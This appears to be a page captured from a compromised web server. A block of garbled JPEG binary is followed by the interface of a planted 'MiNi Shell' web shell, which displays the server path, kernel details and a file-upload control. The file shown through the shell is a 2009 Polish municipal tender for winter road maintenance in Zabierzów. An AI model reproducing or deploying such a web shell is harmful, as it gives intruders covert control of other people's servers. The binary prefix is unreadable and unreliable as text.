JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090923/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090923/162711-N-2009.html

<p class="kh_header"><b>Zabierzów: Zimowe utrzymanie dróg gminnych na terenie Gminy Zabierzów
   w  sezonie zimowym 2009/2010 
z podziałem na II Zadania.</b><br>
<b>Numer ogłoszenia: 162711 - 2009; data zamieszczenia: 23.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Zabierzów , ul. Kolejowa 11, 32-080 Zabierzów, woj. małopolskie, tel. (012) 285 11 40, faks (012) 285 21 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zabierzow.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg gminnych na terenie Gminy Zabierzów
   w  sezonie zimowym 2009/2010 
z podziałem na II Zadania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:

Zimowe utrzymanie dróg gminnych na terenie Gminy Zabierzów w sezonie zimowym 2009-2010 z podziałem na II Zadania.
  
2.	Sieć dróg objętych zimowym utrzymaniem podzielono na cztery Obwody Zimowego Utrzymania (OZU). Podział Gminy Zabierzów na poszczególne OZU wraz z wykazem należących do nich dróg zawarto w Rozdziale IV.
3.	Zadanie nr I obejmuje zimowe utrzymanie dróg w obrębie miejscowości : Radwanowice, Rudawa, Pisary, Niegoszowice, Brzezinka, Więckowice, Kobylany, Karniowice, Bolechowice, Brzezie, Ujazd, Zelków tj. I i II Obwód Zimowego Utrzymania ( OZU )  w skład którego wchodzą:
3.1 drogi publ. I kolejność odśnieżania (II standard) - 21,7 km
3.2 drogi publ. II kolejność odśnieżania (III standard) - 24,95 km
3.3 drogi pozostałe (inne) II kolejność odśnieżania (III standard) - 20,9 km 
4.	Zadanie nr II  obejmuje zimowe utrzymanie dróg w obrębie miejscowości: Aleksandrowice, Kleszczów, Brzoskwinia, Młynka, Nielepice, Zabierzów, Balice, Burów, Szczyglice, Kochanów, Rząska tj. III i IV Obwód Zimowego Utrzymania 
      ( OZU)  w skład którego wchodzą:
      4.1 drogi publ. I kolejność odśnieżania (II standard) - 18,3 km
      4.2 drogi publ. II kolejność odśnieżania (III standard) - 20,65 km
      4.3 drogi pozostałe (inne) II kolejność odśnieżania - 31,2 km 
5.	Zamawiający wyróżnia następujący sposób wykonania przedmiotu zamówienia:
5.1 Akcja czynna - jest to wykonywanie na drodze czynności związanych z utrzymaniem przejezdności poprzez usuwanie śniegu i zwalczanie śliskości zgodnie z przyjętymi standardami. Akcja czynna  czyli bezpośrednia praca sprzętu w terenie prowadzona jest w systemie interwencyjnym, tzn. na polecenie osób odpowiedzialnych po stronie Zamawiającego za zimowe utrzymanie dróg, co będzie odnotowane i potwierdzone przez Wykonawcę w rejestrze poleceń prowadzonym przez inspektora nadzoru. W przypadku nagłego załamania pogody, Wykonawca  może podjąć samodzielnie decyzję o rozpoczęciu akcji . O fakcie tym winien niezwłocznie powiadomić Zamawiającego.
5.2  Akcja bierna - jest to utrzymanie w gotowości technicznej sprzętu, pełnienie dyżurów dyspozytorskich, patrolowanie dróg, jednorazowe interwencyjne wyjazdy sprzętu do przywrócenia przejezdności na danym odcinku np. na wezwanie policji. Upoważniony przedstawiciel Zamawiającego może zawiesić prowadzenie  Akcji biernej  . Zawieszenie i odwołanie zawieszenia   Akcji biernej nastąpi z wyprzedzeniem 6 h i zostanie odnotowane w rejestrze poleceń. Zawieszenie AB może być spowodowane sprzyjającymi warunkami atmosferycznymi (np. utrzymujące się w porze nocnej temperatury dodatnie) natomiast jej wznowienie z uwagi na spodziewane pogorszenie warunków pogodowych.
5.3 W przypadku zmiany w ciągu doby rozliczeniowej  statusu Akcji biernej na Akcję czynną Wykonawcy przysługuje wynagrodzenie wyłącznie  za Akcję czynną.
5.4 W przypadku zawieszenia Akcji biernej Wykonawcy nie przysługuje wynagrodzenie z tytułu prowadzenia  Akcji biernej.
6.	Wykonawca zobowiązany jest  do prowadzenia dziennika w którym będzie odnotowywał rodzaj akcji prowadzonej w danej dobie, a w przypadku akcji czynnej  również  ilości km  dróg objętych zimowym utrzymaniem . Dziennik musi zawierać rubrykę na wpis Inspektora potwierdzający, że usługa została wykonana zgodnie z przyjętymi standardami .
7.	Doba rozumiana jest jako czas od godz. 00:01 do godz.24:00 danego dnia.
8.	Wykonawca określi w ofercie następujące ceny jednostkowe dla poszczególnych rodzajów akcji.
8.1 Akcja czynna :
- cenę dobowego utrzymania 1km dróg publicznych w II standardzie,
- cenę dobowego utrzymania 1 km publicznych dróg w III standardzie
- cenę za jednokrotne prowadzenie akcji na odcinku 1 km i wg standardu III dla pozostałych dróg  
8.2 Akcja bierna :
- cenę za 1 dobę utrzymania w gotowości do pracy obsługi i sprzętu Wykonawcy, wynoszącą max. 20 % ogólnej dobowej kwoty za utrzymanie dróg publicznych w II standardzie zgodnie z zakresem (kilometrażem) obowiązującym w Zadaniu I lub Zadaniu II. 
9.	Celem sprawnego reagowania na zmienne warunki pogodowe Wykonawca winien zapewnić organizację służb dyżurnych w poszczególnych OZU, odpowiedzialnych za monitoring warunków atmosferycznych i warunków ruchu oraz utrzymanie gotowości i prowadzenie akcji czynnej w obszarze powierzonego OZU oraz koordynację akcji między nimi.
10.	Zamawiający zastrzega sobie prawo aktualizacji załączonego wykazu dróg objętych zimowym utrzymaniem dróg, 
11.	Akcję czynną należy podjąć nie później niż 1 godzinę po powiadomieniu.
12.	Wykonawca musi być dyspozycyjny całą dobę oraz musi posiadać telefon komórkowy, obejmujący swoim zasięgiem teren Gminy Zabierzów.
13.	Standardy utrzymania dróg przedstawia Rozdział IV.
14.	Dostawę materiałów niezbędnych do prowadzenia zimowego utrzymania dróg zapewnia Wykonawca.
15.	W przypadku konieczności wywozu nadmiaru śniegu, Wykonawca we własnym zakresie usunie zalegające hałdy ( dotyczy dróg na terenach zabudowanych oraz tych przy których zlokalizowane są krawężniki ).
16.	Po wykonaniu przedmiotu zamówienia Wykonawca we własnym zakresie uprzątnie z jezdni (dotyczy dróg na terenach zabudowanych oraz tych przy których zlokalizowane są krawężniki ) nadmiar materiału użytego do posypywania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-0, 90.63.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 2000,00<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Do przetargu zostaną zakwalifikowani wykonawcy, którzy:

a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.;
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
 d   nie podlegający wykluczeniu z postępowania o udzielenie zamówienia,

Ponadto Wykonawcy muszą:

a)	wykazać się wykonaniem w ciągu ostatnich trzech przed wszczęciem postępowania o udzielenie zamówienia a jeśli okres prowadzenia działalności jest krótszy -w tym okresie minimum jedną usługą odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia, o wartości co najmniej 100 000 zł brutto,
b)	mieć w dyspozycji minimalną ilość sprzętu osobno dla każdego z zadań : 

    - pługopiaskarki - 2 szt.,
    - ciągniki dwunapędowe wyposażone w pług i  rozrzutnik - 4 szt. 
    - ładowarka jednonaczyniowa - 1 szt.
    - równiarka z lemieszem czołowym - 1 szt.
    - samochód samowyładowczy - 1 szt.
    z zapewnieniem jednoczesnej pracy minimum 4 jednostek sprzętowych 
c)	posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości nie mniejszej niż 90 000 zł,

UWAGA :
Wykonawca może powierzać roboty specjalistyczne podwykonawcom, za działanie których bierze pełną odpowiedzialność. W treści oferty należy ten fakt uwzględnić - na zasadach określonych w SIWZ. Warunkiem wypłaty wynagrodzenia Wykonawcy jest uprzednie uiszczenie przez niego należności podwykonawców. Zamawiającemu przysługuje prawo żądania od Wykonawcy zmiany podwykonawcy, jeżeli ten realizuje roboty w sposób wadliwy lub niezgodny z założeniami i przepisami.

Spełnienie powyższych warunków  zweryfikuje Komisja Przetargowa badając dokumenty,
 o których mowa w ust. III.

1.W celu potwierdzenia spełnienia opisanych wyżej warunków, Wykonawca musi załączyć do oferty oświadczenia lub dokumenty wymagane w ust. III.
Ocena spełnienia ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o oświadczenia lub dokumenty załączone do oferty.
Z treści przedstawionych dokumentów musi wynikać jednoznacznie iż ww warunki wykonawca spełnia.
Niespełnienie chociażby jednego z warunków udziału w przetargu skutkować będzie wykluczeniem Wykonawcy z postępowania i odrzuceniem oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Opis przedmiotu zamówienia lub oświadczenie złożone na druku OFERTA zał. nr 1 o zgodności przedmiotu oferty z przedmiotem zamówienia. 
2.	Pełnomocnictwo - w przypadku podpisywania oferty i pozostałych dokumentów przez pełnomocnika  (załączyć jeżeli dotyczy).
3.	Aktualny odpis z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają  wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (określający pełną nazwę firmy, stan prawny, miejsce rejestracji, dokładny adres firmy składającej ofertę, jednocześnie potwierdzający, że profil działania oferenta odpowiada profilowi robót objętych przetargiem).
4.	Umowę regulującą współpracę podmiotów występujących wspólnie, np. umowa spółki cywilnej lub inne (załączyć jeżeli dotyczy).
5.	Oświadczenie Wykonawcy w trybie art.22 ust. 1 Ustawy prawo zamówień publicznych oraz że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust.1 ww ustawy na formularzu stanowiącym  załącznik nr 2.
6.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa odpowiedni dokument lub dokumenty zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane załączyć jeżeli dotyczy.
7.	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca,  na  załączniku Nr 3  zatytułowanym Potencjał techniczny.
  Wymagane minimum potencjału technicznego dla obsługi dróg objętych jednym  Zadaniem:
   - pługopiaskarki - 2 szt.,
   - ciągniki dwunapędowe wyposażone w pług i rozrzutnik - 4 szt. 
   - ładowarka jednonaczyniowa - 1 szt.
   - równiarka z lemieszem czołowym - 1 szt.
   - samochód samowyładowczy - 1 szt.
   


8. Pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie o którym mowa w pkt  7 Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.  
9.  Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z
podaniem ich wartości oraz daty i miejsca na załączniku nr 4 Doświadczenie zawodowe.
Wymagane minimum:. jedna usługa odpowiadająca swoim rodzajem usłudze stanowiącej przedmiot zamówienia, o wartości nie mniejszej niż 100 000 zł brutto.
10. Dokumenty potwierdzające że usługa, o której mowa w pkt. 9 została wykonana z należytą starannością.
11.W załączniku nr 5  zatytułowanym Podwykonawcy żądamy wskazania, jaką część zamówienia wykonawca zamierza powierzyć podwykonawcy.
Jeżeli wykonawca nie zamierza powierzyć części zamówienia podwykonawcom, załącza Załącznik nr 5 do oferty z adnotacją nie dotyczy.
12. Polisa lub inny dokument ubezpieczenia potwierdzający , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 90 000 zł.
138. Ponadto do oferty należy dołączyć : podpisany lub zaparafowany projekt umowy. 
W przypadku podmiotów występujących wspólnie przez kilku przedsiębiorców, każdy ze wspólników musi złożyć dokumenty wymienione w pkt. 3, 4, 5, 6. Pozostałe dokumenty będą traktowane jako wspólne..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zabierzow.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać również w siedzibie zamawiającego pok. nr 30 lub za pośrednictwem poczty (opłata 50 zł)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2009 godzina 10:00, miejsce: Urząd Gminy Zabierzów, Biuro Obsługi Interesanta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 01 <b>NAZWA:</b> Zimowe utrzymanie dróg gminnych na terenie Gminy Zabierzów
   w  sezonie zimowym 2009-2010 
z podziałem na II Zadania..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr I obejmuje zimowe utrzymanie dróg w obrębie miejscowości : Radwanowice, Rudawa, Pisary, Niegoszowice, Brzezinka, Więckowice, Kobylany, Karniowice, Bolechowice, Brzezie, Ujazd, Zelków tj. I i II Obwód Zimowego Utrzymania ( OZU )  w skład którego wchodzą:
3.1 drogi publ. I kolejność odśnieżania (II standard) - 21,7 km
3.2 drogi publ. II kolejność odśnieżania (III standard) - 24,95 km
3.3 drogi pozostałe (inne) II kolejność odśnieżania (III standard) - 20,9 km.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-0, 90.63.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 02 <b>NAZWA:</b> Zimowe utrzymanie dróg gminnych na terenie Gminy Zabierzów
   w  sezonie zimowym 2009/2010 
z podziałem na II Zadania..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr II  obejmuje zimowe utrzymanie dróg w obrębie miejscowości: Aleksandrowice, Kleszczów, Brzoskwinia, Młynka, Nielepice, Zabierzów, Balice, Burów, Szczyglice, Kochanów, Rząska tj. III i IV Obwód Zimowego Utrzymania 
      ( OZU)  w skład którego wchodzą:
      4.1 drogi publ. I kolejność odśnieżania (II standard) - 18,3 km
      4.2 drogi publ. II kolejność odśnieżania (III standard) - 20,65 km
      4.3 drogi pozostałe (inne) II kolejność odśnieżania - 31,2 km.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-0, 90.63.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com